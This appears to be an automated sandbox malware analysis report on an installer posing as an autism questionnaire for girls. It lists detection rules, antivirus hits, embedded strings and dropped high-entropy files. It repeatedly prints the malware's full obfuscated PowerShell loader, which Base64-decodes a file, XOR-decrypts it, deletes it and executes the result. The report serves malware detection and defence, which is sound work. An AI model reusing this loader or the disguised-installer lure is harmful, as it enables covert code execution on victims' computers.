            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132837360327648466.5516.DefaultAppDomain.powershell

            Data Obfuscation:

            barindex
            Sigma detected: Powershell Decrypt And Execute Base64 DataShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for submitted fileShow sources
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeVirustotal: Detection: 35%Perma Link
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeMetadefender: Detection: 20%Perma Link
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeReversingLabs: Detection: 35%
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeAvira: detected
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.383501871.00000000038C0000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000003.388759087.0000000007351000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.394460338.00000000038C4000.00000004.00000001.sdmp
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0040AEF4 FindFirstFileW,FindClose,0_2_0040AEF4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040A928
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0060C2B0 FindFirstFileW,GetLastError,3_2_0060C2B0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0040E6A0 FindFirstFileW,FindClose,3_2_0040E6A0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,3_2_0040E0D4
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,3_2_006B8DE4
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: powershell.exe, 0000000C.00000002.461943475.0000000007290000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.452147926.0000000003819000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000C.00000003.397762259.0000000007388000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.397657917.000000000736E000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
            Source: powershell.exe, 0000000C.00000003.453010711.0000000008ACF000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://cscasha2.ocsp-certum.com04
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://ocsp.digicert.com0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://ocsp.digicert.com0A
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: powershell.exe, 0000000C.00000002.456870724.0000000004631000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.452445471.0000000005301000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: http://www.digicert.com/CPS0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: https://jrsoftware.org/
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: https://jrsoftware.org0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.327223650.0000000003712000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000003.285499502.0000000003513000.00000004.00000001.sdmpString found in binary or memory: https://www.certum.pl/CPS0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drString found in binary or memory: https://www.innosetup.com/
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282256431.0000000002520000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, 00000000.00000003.282523000.000000007FB50000.00000004.00000001.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Writes many files with high entropyShow sources
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GhBlUWJfmbEFNSgOeti.dsHkrSPjKTDoWibhB entropy: 7.99843269262Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\hHgsQfEaVJSxXibp.mQlHnMaSPoKN entropy: 7.99869294058Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lKRdxuzNOmjsMkStLW.UwzXkbdQLrAWHEhv entropy: 7.99847932653Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\lpvtEnzFmSrBxs.bvthIxBqKRcrP entropy: 7.99807156061Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\liFAaWLePtdOXCRGpuQ.tSMqFINOpJZVrnmQ entropy: 7.9968953651Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\nthwmpDXQUGoBH.RvHaDZmNlAocXVgTxL entropy: 7.99846398441Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\ftehrgjdHTqRZ.cdQmyTfGIkCYzh entropy: 7.99829935224Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\zULyElrBPWfFTGqjKuR.LuHOZEIewPy entropy: 7.99662034912Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HgscSMKine.GdwrFeoEtaxORb entropy: 7.99855944387Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NSTBOEHtRMVxUwzdC.eUitPRVkDsJE entropy: 7.99837992013Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\soQwPHCEaWcNnAgRKu.GUhPcAHkzNRoMwdvV entropy: 7.99892152094Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gzTuApnUWZRGdXFSYr.LCFTiNwmPDcq entropy: 7.99900824188Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\bDZLNaQSRephwkgE.bzmDpAKEtnYiw entropy: 7.99856007432Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\RNcZQGstayolJSYCBxE.VhPGSvfcFzHuXrnW entropy: 7.99737264002Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\KwrkAqLXNRpPWEaic.cInVZjfmQkhePG entropy: 7.99856536488Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pWvkATwEHSh.AqsJwQazvZIXiBC entropy: 7.99646527424Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\XfhvNpPxsGnYwEj.KsfSpNicARGJODo entropy: 7.99891208661Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\VTeCclXuGgiqHBty.gVkwyjzbJWDF entropy: 7.99823102431Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\pXLuVbZASaMlEkmB.HvyDrojqUXiw entropy: 7.99872548534Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\phavEfQLqZxUOAcgMu.cBsHAFSbqxwgkUGOuYo entropy: 7.99891451364Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\IwTztFHhQrdRxGpKcUW.tAKIPwaJkSqjgsHbDG entropy: 7.99678325799Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uKhTXaEClgGUWFHeSBJ.QqbgwODAcirejphRKoJ entropy: 7.99615497718Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\MisYlNcbAgIjX.zNaCVgrfLoH entropy: 7.99900546472Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qptaygGDHOvhK.YSKJRLiycNZuhvbWx entropy: 7.99858628917Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\NMREBxycaFdrlbuOGUk.DbeWJYKnNLBmy entropy: 7.99890746983Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\yjfLcAxmiM.OWifzdmXlYyKEDMI entropy: 7.99737951004Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\HsbVFMRyapmDkzTXI.vsrDUdewyaFKxGj entropy: 7.99685313851Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\klgNQBPouRDhqUv.vwojHfsturgXbnd entropy: 7.99896745114Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FXsftcBnRmArDTNopIG.nBRdLfvJAjwxHi entropy: 7.99712639128Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\cbwhGoKafEsNdO.hkbPgXmfDFuzyoR entropy: 7.99822357567Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\DkJrpwuAXeOI.hIMvrwnfOGdyLp entropy: 7.99900116588Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\QzlyLWCNAPcGtTgHxr.qWXzuIgseixTtYcdarV entropy: 7.99797100087Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\EIbPfKnJUvZcgtBai.iGKXJZaFmvbpAoVjs entropy: 7.99876668155Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SpoqdPasHmF.qLfZsOXHPMDmUA entropy: 7.99847701545Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GdqiwFBQpsDrbZKN.CSNGEXIeZWT entropy: 7.99776210794Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\gEGPTCzXcJpLbsW.aGOncoiTpkShXyWN entropy: 7.99676364181Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\FvCmpXgloUHxqLBz.jQcUyPWvmAh entropy: 7.99702843915Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\SMUFCxligOrHNwktv.gnvGhdpoQZiTuaYkCHV entropy: 7.99758311515Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\GcDdpgBqmPQ.muUMBsQZhlLo entropy: 7.99840115783Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OKVaIsnDYSru.wRkYivJdPtFmOBqUgE entropy: 7.99612394409Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xnplLXbvwmcNAiIZ.LjIyFXNTqroGmkfAPih entropy: 7.99884189467Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\alkiEOVhjq.QklCoYcFqu entropy: 7.99824579608Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\rwyFtKsoXUNMILDWhJv.OsZECjYcXVLyS entropy: 7.99906102873Jump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\OMNSVpazArFDcgyd.UOYuHkRgaSNFJojlxev entropy: 7.99842771691Jump to dropped file
